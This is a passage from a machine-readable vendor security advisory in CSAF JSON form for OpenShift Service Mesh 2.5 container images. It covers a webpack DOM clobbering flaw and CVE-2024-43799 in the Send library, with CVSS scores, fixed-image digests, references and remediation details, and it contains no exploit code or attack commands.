"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule"
},
{
"cve": "CVE-2024-43799",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:30.869487+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311153"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "send: Code Execution Vulnerability in Send Library",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43799"
},
{
"category": "external",
"summary": "RHBZ#2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43799",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43799"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35",
"url": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg",
"url": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg"
}
],
"release_date": "2024-09-10T15:15:17.727000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:53+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7725"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
